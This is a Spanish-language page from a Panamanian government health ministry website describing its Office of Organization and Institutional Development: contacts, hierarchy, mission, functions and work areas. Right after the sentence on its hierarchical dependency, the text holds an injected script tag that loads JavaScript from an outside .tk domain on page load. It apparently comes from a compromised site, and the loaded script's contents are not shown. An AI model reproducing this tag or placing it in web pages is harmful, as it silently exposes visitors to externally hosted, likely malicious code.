Gobierno Nacional de Panamá

Oficina de Organización y Desarrollo Institucional

Información de contacto

Teléfono:
512-9263 / 512- 9480

Ubicación y dependencia jerárquica

La Oficina de Organización y Desarrollo Institucional está ubicada en el Nivel Asesor y depende jerárquicamente del Despacho Superior.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>
Misión:
  1. Asesorar a la Institución en materia de desarrollo organizacional, con base en su Misión y Visión, para asegurar la alineación permanente de la Organización con los objetivos que le corresponde cumplir como ente Rector del Sector Salud.
Funciones:
  1. Asesorar permanentemente a todos los niveles de la Institución, en materia de desarrollo organizacional y sistemas administrativos.
  2. Asesorar al Despacho Superior, sobre las propuestas de reorganización a la Estructura Organizativa y el Manual de Organización de la Institución, para su revisión y aprobación por parte del Despacho Superior.
  3. Asesorar y brindar información a funcionarios, estudiantes y público en general en materia de Organización y Desarrollo Institucional.
  4. Aplicar y divulgar diagnósticos administrativos a las diferentes Unidades Administrativas, para detectar problemas o situaciones que afectan la eficiencia organizacional y asesorar en la toma de decisiones para el mejoramiento continuo.
  5. Participar, en conjunto con las diferentes Unidades Administrativas, en las actividades de rediseño de los atributos de calidad de los servicios y en el rediseño de los procesos.
  6. Aplicar Auditorías de Procesos en las diferentes Unidades Administrativas de la Organización.
  7. Participar en el Plan de Mejora de la Calidad de los Servicios de la Institución, que establezca el Despacho Superior.
  8. Elaborar, con la participación del personal de las Unidades Administrativas, los Manuales de los servicios que brinda y actualizarlos periódicamente.
  9. Elaborar y/o actualizar periódicamente el Manual de Organización de toda la Institución, debidamente autorizados por el Nivel Superior.
Organización Interna

La Oficina de Organización y Desarrollo Institucional para el desarrollo de sus funciones, se divide en las siguientes áreas de trabajo: Análisis Administrativos; Procedimientos y Sistemas y, Organización y Funciones.